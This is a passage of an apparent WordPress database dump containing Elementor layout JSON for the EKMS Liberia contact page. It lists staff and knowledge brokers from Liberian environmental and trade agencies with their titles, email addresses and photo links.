"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23395,3400,'_elementor_edit_mode','builder'),(23396,3400,'_elementor_template_type','wp-page'),(23397,3400,'_elementor_version','3.0.16'),(23398,3400,'_wp_page_template','default'),(23399,3400,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\n<p>Conservation Manager <\\/br> FDA <\\/br>\\n<a href=\\\"mailto:blamahg@gmail.com\\\">blamag@gmail.com<\\/a> <\\/br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size